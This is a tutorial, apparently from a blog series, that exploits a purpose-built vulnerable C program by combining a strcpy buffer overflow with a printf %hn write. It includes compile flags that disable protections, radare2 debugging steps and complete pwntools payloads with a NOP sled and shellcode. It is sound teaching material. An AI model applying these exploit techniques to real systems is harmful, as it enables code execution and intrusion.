Mastering Binary Exploitation: Unleashing the Power of Format String and Buffer Overflow

November 21, 2023

Initiating Linux Binary Exploitation: A Beginner's Expedition into Code Manipulation

Introduction

Welcome to the latest installment of our series on binary exploitation in Linux. Today, we delve deeper into this intriguing world, building on our previous exploration of format strings. In this chapter, we're set to embark on a fascinating journey: simultaneously exploiting multiple vulnerabilities. Specifically, we'll tackle both buffer overflow and format string vulnerabilities, demonstrating the intricate dance of exploiting these flaws in unison.

Our adventure today is not just about exploiting vulnerabilities; it's also a deep dive into the art of code analysis using radare2. This exploration will empower you to navigate through various challenges that might arise during exploit development, challenges often stemming from unexpected compiler behaviors.

So, buckle up and prepare for an insightful journey as we unravel the complexities of binary exploitation, step by step. Let's dive in!

Exploring the Vulnerable Code

Let's dive into the heart of our discussion by examining a piece of vulnerable code. This code, while simple in function, opens the door to deeper concepts of binary exploitation.

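#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Note: the parameter names are swapped relative to convention;
   here argc is the argument vector and argv is the count. */
int main(int argv,char **argc) {
	short int zero=0;                       /* loop guard: must be 0 for main to return */
	int *plen=(int*)malloc(sizeof(int));    /* destination of the %hn write */
	char buf[256];

	strcpy(buf,argc[1]);                    /* unchecked copy: buffer overflow */
	printf("%s%hn\n",buf,plen);             /* %hn stores the character count (2 bytes) via plen */
	while(zero);                            /* spins forever if zero is nonzero */
}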

How to Compile the Code

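For those who are following along, here's the command to compile this code. As always, we keep the compilation process consistent: -m32 builds a 32-bit binary, -no-pie keeps the code at fixed addresses, -fno-stack-protector disables stack canaries, -z execstack marks the stack executable so injected shellcode can run, -mpreferred-stack-boundary=2 aligns the stack to 4 bytes, and -ggdb adds debugging information.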

gcc -m32 -no-pie -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o vulnerable vulnerable.c

Understanding the Code Dynamics

What we've got here is a straightforward piece of code that takes user input and displays it. Let's break down its mechanics:

Buffer Allocation: A 256-byte buffer, buf, holds the user input, which is copied in with strcpy. Nothing checks the input size, so any argument longer than 255 characters overflows the buffer.
Loop Control Variable: The variable zero controls the program's exit. While it stays 0, while(zero); falls through and main returns. If it is overwritten with any nonzero value, the program spins in an infinite loop and never reaches its return.
Memory Manipulation Pointer: Then, there's plen. printf uses this pointer as the destination for %hn, which stores the number of characters printed so far at the address plen holds. %hn writes 2 bytes instead of the 4 bytes written by %n, so only the low 16 bits of the count are stored. If we control plen, we control where that 2-byte write lands.
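To make the %hn behavior concrete, here is a minimal Python model of the write. It is a sketch, not glibc's implementation: apply_hn is a hypothetical helper, and it assumes a little-endian target (as on x86) where the count is truncated to its low 16 bits.

```python
import struct

def apply_hn(memory: bytearray, offset: int, chars_printed: int) -> None:
    """Model printf's %hn: store the low 16 bits of the running count."""
    struct.pack_into("<H", memory, offset, chars_printed & 0xFFFF)

# A 4-byte little-endian int that initially holds 0x41414141.
cell = bytearray(struct.pack("<I", 0x41414141))

apply_hn(cell, 0, 5)            # printf has emitted 5 characters so far
after_small = struct.unpack("<I", cell)[0]

apply_hn(cell, 0, 0x10000)      # 65536 characters: the low 16 bits are zero
after_wrap = struct.unpack("<I", cell)[0]

print(hex(after_small), hex(after_wrap))   # 0x41410005 0x41410000
```

Only the two low bytes change; the upper half of the 4-byte cell keeps its old contents, which is why %hn suits a 2-byte variable like zero.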

A Note on Stack Layout: The order and spacing of these variables on the stack are decided by the compiler and may differ from what the source suggests, as we will see as we progress.

Crafting the Attack Strategy

Our primary goal with this exploit, as with many others, is to cleverly execute code by leveraging the design of the program. Let's explore our approach:

Buffer Overflow Consideration: The most straightforward tactic might seem to be a buffer overflow that overwrites the return address. However, this strategy has a catch: zero sits between buf and the return address, so the overflow also overwrites zero. With zero nonzero, the program loops forever and never returns, so the overwritten return address is never used.
Challenges with Direct Injection: One might consider writing "0000" over zero as part of the overflow. But there's a twist: the ASCII string "0000" is stored as 0x30303030, which is nonzero. Real zero bytes are not an option either, because strcpy stops copying at the first null byte.
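Both obstacles are easy to check offline. The sketch below uses a hypothetical c_strcpy helper that only models which bytes strcpy would copy (everything before the first null byte); it is not the libc routine.

```python
import struct

def c_strcpy(src: bytes) -> bytes:
    """Return the bytes strcpy would copy: everything before the first NUL."""
    return src.split(b"\x00", 1)[0]

# The text "0000" is four 0x30 bytes, so it reads back as a nonzero integer.
as_int = struct.unpack("<I", b"0000")[0]

# Embedding real zero bytes does not help: the copy ends at the first one.
with_nul = b"AAAA" + b"\x00\x00" + b"BBBB"
copied = c_strcpy(with_nul)

print(hex(as_int), copied)   # 0x30303030 b'AAAA'
```

Everything after the first null byte, including the bytes meant for the return address, would never reach the stack.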

How to Navigate These Challenges? We'll split our approach into two critical steps:

Step 1: Utilizing Buffer Overflow: Firstly, we'll use the buffer overflow vulnerability to our advantage. This involves adjusting variable values to our desired figures and altering the return address to control the program's flow. Additionally, we'll insert a shellcode within the buffer, setting the stage for executing our code.
Step 2: Avoiding the Infinite Loop: To undo the damage the overflow does to zero, we'll employ the pointer plen. The overflow overwrites plen as well, so we make it point to zero; printf's %hn then writes the low 16 bits of its character count there. The value we want is 0x0000, so the number of characters printed before %hn must be a multiple of 0x10000.

Visualizing the Strategy:

Building the Exploit Step-by-Step

Developing an exploit requires a meticulous approach. Let's walk through the stages of crafting our exploit, ensuring we manipulate the zero variable effectively.

The success of our exploit hinges on the character count. To make %hn store 0x0000 in zero, printf must have printed exactly 65536 characters (0x10000 in hexadecimal, whose low 16 bits are all zero) by the time it reaches %hn. Those characters all come from buf, which strcpy fills from argc[1], so the payload we pass as the first argument must be exactly 65536 bytes long. The trailing newline is printed after %hn and does not count.
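The count arithmetic generalizes to any 16-bit target value. A small sketch, with padding_for_hn as a hypothetical helper name: given how many characters the payload already contains, it returns how much padding is needed so that the low 16 bits of the total match the value we want %hn to store.

```python
def padding_for_hn(target: int, already_printed: int) -> int:
    """Extra characters needed so (already_printed + pad) & 0xFFFF == target."""
    if not 0 <= target <= 0xFFFF:
        raise ValueError("%hn can only store a 16-bit value")
    return (target - already_printed) % 0x10000

# 256 bytes of buf plus 14 bytes of overwritten stack data, target value 0.
pad = padding_for_hn(0, 256 + 14)
print(pad, 256 + 14 + pad)   # 65266 65536
```

A count of 0 would also store 0x0000, but the payload has to be longer than buf to reach the return address, so 65536 is the smallest usable total here.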

Characters to be displayed on the screen

Next, we turn to radare2 for debugging purposes. By opening and parsing the executable with this tool, our aim is to precisely pinpoint the address of the buf variable. This step is crucial as it allows us to understand exactly where our injected data resides in memory, setting the stage for the subsequent steps in our exploit development process.

r2 ./vulnerable
aaa

Setting a breakpoint at the strcpy function, we prepare to run our crafted payload:

db <address>

Our initial payload looks like this:

from pwn import * 
import sys

payload = b'A'*65536
sys.stdout.buffer.write(payload)

Executing it in radare2:

ood "`!python3 exploit.py`"

After executing our setup, the next step is straightforward. We'll use the command "dc" to continue to the breakpoint, then the command "v" to inspect the registers, in particular eax. Why eax? At this point it contains the address of buf: the compiler loads the address of buf into eax and then places it on the stack as the destination argument for strcpy. Note that in my radare2 session buf is labeled "dest".

Upon successful execution and positioning ourselves at the designated instruction, an interesting revelation unfolds. We can observe that the memory address of buf now holds the content we've meticulously crafted and passed through our exploit. This is a pivotal moment in our journey of exploit development, as it visually confirms the successful manipulation of the program's memory – a clear indicator that our exploit is on the right track.

Now at this crucial juncture, our next objective is to pinpoint and modify the memory address of the zero variable using plen. To achieve this, we turn to the command "afvd" in our toolkit. This command is quite handy as it displays the variables along with their respective values in the current context. Through this process, we identify that in our memory landscape, var_6h is the label for zero, and intriguingly, var_ch represents plen. This information is vital as it lays the groundwork for the precise memory manipulation required for our exploit to succeed.

This insightful deduction comes from a close examination of the program's assembly code. If we observe the assembly code, as illustrated in the accompanying figure, we notice that var_6h is established right at the outset and is initialized with a value of 0. This clearly suggests its role as the zero variable. Similarly, var_ch emerges as a key player during the stack preparation phase, particularly in the lead-up to calling printf alongside dest (which we've previously identified as buf). This contextual placement strongly implies that var_ch is indeed what we refer to as plen. These subtle hints hidden within the assembly code are crucial for understanding and manipulating the program's behavior.
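The variable names also encode where each variable lives. The sketch below assumes radare2's default naming for frame-pointer-based locals, where var_Nh sits N (hexadecimal) bytes below ebp; r2_var_offset is a hypothetical helper, not part of radare2.

```python
import re

def r2_var_offset(name: str) -> int:
    """Convert a name such as 'var_ch' into its offset from ebp (here -12)."""
    match = re.fullmatch(r"var_([0-9a-f]+)h", name)
    if match is None:
        raise ValueError(f"unexpected variable name: {name}")
    return -int(match.group(1), 16)

zero_off = r2_var_offset("var_6h")   # zero
plen_off = r2_var_offset("var_ch")   # plen
gap = zero_off - plen_off            # bytes from the start of var_ch to zero

print(zero_off, plen_off, gap)       # -6 -12 6
```

The distance between the two variables is worth keeping in mind when laying out the payload, since it determines how many bytes separate the overwritten pointer from zero.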

Armed with this crucial data, we are now in a position to construct a fully functional exploit.

from pwn import * 
import sys

buf_addr = <change>
buf_size = 256
zero_addr = <change>
shellcode = shellcraft.echo("hello\n")

payload = b"\x90" * 80
payload += asm(shellcode)
payload += b"D"*(256-80-len(asm(shellcode)))
payload += p32(zero_addr) # plen -> address of zero
payload += b"AA" # zero -> placeholder, fixed later by %hn
payload += p32(buf_addr) # ebp -> placeholder
payload += p32(buf_addr) # return addr -> start of buf
payload += b"C" * (65536-256-14) # pad to 65536 bytes (14 = 4+2+4+4)
sys.stdout.buffer.write(payload)

The payload is a direct implementation of the strategy outlined earlier. We start buf with a NOP sled (0x90, the x86 "no operation" instruction), followed by shellcode that simply prints "hello", and fill the rest of buf with the character "D". Next comes the address of zero, which lands in plen, then placeholder values for zero and ebp, and finally the return address, which is the address of buf. The remaining "C" characters pad the payload to the 65536 characters required by %hn. The actual values written to zero and ebp don't matter to us; they are placeholders.
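Before running a payload like this, it can help to check its shape without pwntools. The sketch below rebuilds the same field order using only the standard library. The two addresses are illustrative placeholders (the real ones must be read from the debugger), p32 is a local stand-in for the pwntools function of the same name, and STUB is filler standing in for the assembled shellcode.

```python
import struct

def p32(value: int) -> bytes:
    """Little-endian 32-bit pack, a stand-in for pwntools' p32."""
    return struct.pack("<I", value)

BUF_SIZE = 256
BUF_ADDR = 0xFFFECF4C    # illustrative; differs per machine and environment
ZERO_ADDR = 0xFFFED050   # illustrative placeholder
STUB = b"\xcc" * 24      # filler standing in for asm(shellcode)

fields = [
    ("nop sled", b"\x90" * 80),
    ("shellcode", STUB),
    ("filler", b"D" * (BUF_SIZE - 80 - len(STUB))),
    ("plen", p32(ZERO_ADDR)),
    ("zero", b"AA"),
    ("saved ebp", p32(BUF_ADDR)),
    ("return address", p32(BUF_ADDR)),
]
used = sum(len(data) for _, data in fields)
fields.append(("padding", b"C" * (0x10000 - used)))

payload = b"".join(data for _, data in fields)

# Print offset, size and name of every field.
offset = 0
for name, data in fields:
    print(f"{offset:6d}  {len(data):6d}  {name}")
    offset += len(data)

assert len(payload) == 0x10000    # %hn will store 0x0000
assert b"\x00" not in payload     # strcpy would stop at a null byte
```

The two assertions capture the constraints that matter here: the total length fixes the value %hn writes, and a single null byte anywhere (for example inside an address) would cut the copy short.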

However, an interesting observation arises when we run this exploit: it leads to an infinite loop. This unexpected behavior signals that there's more to explore and adjust in our exploit development process.

So, what went awry? To unravel this mystery, a deeper dive into the binary is essential. Given that our primary issue is the infinite loop, our focus shifts to verifying whether the zero variable is being modified as intended. To do this, we'll zero in on the state of the program immediately following the execution of strcpy. This targeted approach will allow us to scrutinize the relevant changes and interactions at a critical juncture in the exploit's execution, shedding light on why the infinite loop is occurring.

After reaching the crucial point post-strcpy execution, our next step is to reapply the "afvd" command. This time, our goal is to acquire the memory address of the variable var_ch, which we know represents plen. Following this, we'll employ the "pd" command to delve into the memory and examine the contents of var_ch. This process is vital for understanding how our exploit interacts with the memory and will provide valuable insights into the state and behavior of plen within the program's memory structure.

In the provided image, we get a clear view of the stack's contents, offering us a crucial checkpoint in our analysis. This visual representation confirms that our buffer overflow attempt has indeed been successful – evidenced by the injection of memory addresses and the presence of "AA" characters (represented in hexadecimal as 41). However, there's a twist: the number of characters isn't aligned as anticipated. The data appear to be in disarray. A closer examination reveals that the intended return address has been inadvertently occupied by the "C" padding, not the actual buffer address as planned. Additionally, the ebp (base pointer) is not positioned correctly. To better understand this misalignment, let's turn to a diagram for a more visual explanation:

To achieve the correct alignment, we deduce that an addition of 6 more characters is necessary. This begs the question: How did this oversight occur in our initial calculations?

The root of our miscalculation is the compiler: it keeps plen in two places on the stack, which throws our original calculations off. Looking at the main function's variables in the image above, both var_ch and plen appear as separate stack slots, so the frame holds more data between buf and the return address than we accounted for. To better grasp this and its impact on our exploit, let's refer to a more detailed image that lays out the current stack situation:
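The misalignment can also be reproduced on paper. The sketch below overlays the first payload onto the frame layout this article arrives at: a 4-byte var_ch, 2 filler bytes, the 2-byte zero, a second 4-byte slot, then the saved ebp and the return address. That layout and both addresses are assumptions taken from this particular build and session; the buffer contents are simplified to "D" characters.

```python
import struct

ACTUAL_LAYOUT = [
    ("buf", 256), ("var_ch", 4), ("filler", 2), ("zero", 2),
    ("extra slot", 4), ("saved ebp", 4), ("return address", 4),
]

def overlay(payload: bytes, layout) -> dict:
    """Slice the payload into the stack slots it would overwrite."""
    slots, pos = {}, 0
    for name, size in layout:
        slots[name] = payload[pos:pos + size]
        pos += size
    return slots

BUF_ADDR = 0xFFFECF4C    # illustrative, from the article's session
ZERO_ADDR = 0xFFFED052   # illustrative

# First attempt: plen, zero, ebp and return address packed back to back.
first_payload = (b"D" * 256 + struct.pack("<I", ZERO_ADDR) + b"AA"
                 + struct.pack("<I", BUF_ADDR) * 2 + b"C" * 16)

slots = overlay(first_payload, ACTUAL_LAYOUT)
for name, data in slots.items():
    if name != "buf":
        print(f"{name:15s} {data.hex()}")
```

Under these assumptions the return address slot receives "CCCC" (43434343) and the saved ebp gets half an address followed by padding, which matches the disarray seen in the debugger.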

Moreover, a closer look at var_ch reveals another detail: instead of the expected 4 bytes, it takes up 6 bytes on the stack, so 2 filler bytes are needed between the pointer and zero. Together with the extra 4-byte plen slot, that accounts for the 6 missing characters. With this, we can revise our exploit. Let's take a look at how the updated exploit might be structured:

from pwn import * 
import sys

buf_addr = 0xfffecf4c 
buf_size = 256
zero_addr = 0xfffed052 #buf_addr + buf_size + 4 + 2
shellcode = shellcraft.echo("hello\n")

payload = b"\x90" * 80
payload += asm(shellcode)
payload +=  b"D"*(256-80-len(asm(shellcode))) 
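payload += p32(zero_addr) # var_ch -> address of zero (used by %hn)
payload += b"EE" # remaining 2 bytes of var_ch (filler)
payload += b"AA" # zero -> placeholder, fixed by %hn
payload += b"EEEE" # plen slot (filler)
payload += p32(buf_addr) # ebp -> placeholder
payload += p32(buf_addr) # return addr -> start of buf
payload += b"C" * (65536-256-20) # pad to 65536 bytes (20 = 4+2+2+4+4+4)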
sys.stdout.buffer.write(payload)
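The constants in the revised exploit can be re-derived with a few lines of arithmetic. This is only a consistency check on the numbers above; buf_addr is the value from this particular debugging session and will differ elsewhere.

```python
import struct

buf_addr = 0xFFFECF4C   # from the debugging session above
buf_size = 256

# zero sits after buf, the 4-byte pointer and 2 filler bytes.
zero_addr = buf_addr + buf_size + 4 + 2

# Bytes written past buf: var_ch, filler, zero, plen slot, ebp, return address.
new_overhead = 4 + 2 + 2 + 4 + 4 + 4
old_overhead = 4 + 2 + 4 + 4

# Neither address may contain a null byte, or strcpy would stop early.
nul_free = all(b"\x00" not in struct.pack("<I", a) for a in (buf_addr, zero_addr))

print(hex(zero_addr), new_overhead, new_overhead - old_overhead, nul_free)
# 0xfffed052 20 6 True
```

The difference of 6 bytes between the two layouts is exactly the number of characters the first attempt was missing.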

Upon executing our revised exploit within radare2, we can observe a satisfying alignment: all the values now correspond precisely as intended.

By completing the execution process, we reach a pivotal moment: the successful execution of our code is now evident.

A closer look shows why: after printf executes, %hn has written 0x0000 over the placeholder we left in zero, so the while loop exits immediately, main returns to the address of buf, and the infinite loop is avoided.
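The whole sequence (overflow, then the %hn repair) can be modeled in a few lines of Python. This is a simplified simulation, not the real process: memory is a flat bytearray starting at buf, the offsets follow the layout used in the revised exploit, and the buffer contents are replaced by NOP bytes.

```python
import struct

BUF_ADDR = 0xFFFECF4C                 # from the article's session
VAR_CH_OFF, ZERO_OFF, RET_OFF = 256, 262, 272

def build_payload() -> bytes:
    body = b"\x90" * 256                              # stand-in for sled + shellcode
    body += struct.pack("<I", BUF_ADDR + ZERO_OFF)    # var_ch -> address of zero
    body += b"EE" + b"AA" + b"EEEE"                   # filler, zero, plen slot
    body += struct.pack("<I", BUF_ADDR) * 2           # ebp, return address
    return body + b"C" * (0x10000 - len(body))

def simulate(payload: bytes):
    """Model strcpy into buf followed by printf's %hn write."""
    text = payload.split(b"\x00", 1)[0]               # strcpy stops at NUL
    mem = bytearray(len(text) + 1)                    # last byte: terminator
    mem[:len(text)] = text
    target = struct.unpack_from("<I", mem, VAR_CH_OFF)[0] - BUF_ADDR
    struct.pack_into("<H", mem, target, len(text) & 0xFFFF)   # the %hn write
    zero = struct.unpack_from("<H", mem, ZERO_OFF)[0]
    ret = struct.unpack_from("<I", mem, RET_OFF)[0]
    return zero, ret

zero, ret = simulate(build_payload())
print(zero, hex(ret))                                 # 0 0xfffecf4c
```

Appending a single extra character to the payload makes the model store 1 instead of 0, which shows how sensitive the exploit is to the exact length.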

Conclusions

In today’s enlightening journey, we have navigated the complex waters of binary exploitation, focusing on the confluence of buffer overflow and format string vulnerabilities. This thorough exploration has not only reinforced our theoretical understanding but also highlighted the crucial importance of practical experimentation and adaptability in the field of cybersecurity.

Throughout this process, we uncovered how minute details, such as unexpected memory allocation by the compiler, can significantly deviate our initial plans. This experience underscores the importance of meticulous evaluation and a step-by-step problem-solving approach. It also illuminates the invaluable role of tools like radare2 in visualizing and manipulating a program’s memory structure.

The ability to adapt and refine our approaches in the face of unexpected challenges is essential. Each obstacle encountered and overcome not only enhances our exploitation technique but also deepens our understanding of the systems we seek to protect.

In conclusion, this chapter has been more than an exercise in exploit development; it's been a lesson in tenacity and continuous learning. It reminded us that in the realm of cybersecurity, theory and practice go hand in hand, and being prepared for the unexpected is an integral part of our quest to strengthen and secure our digital systems.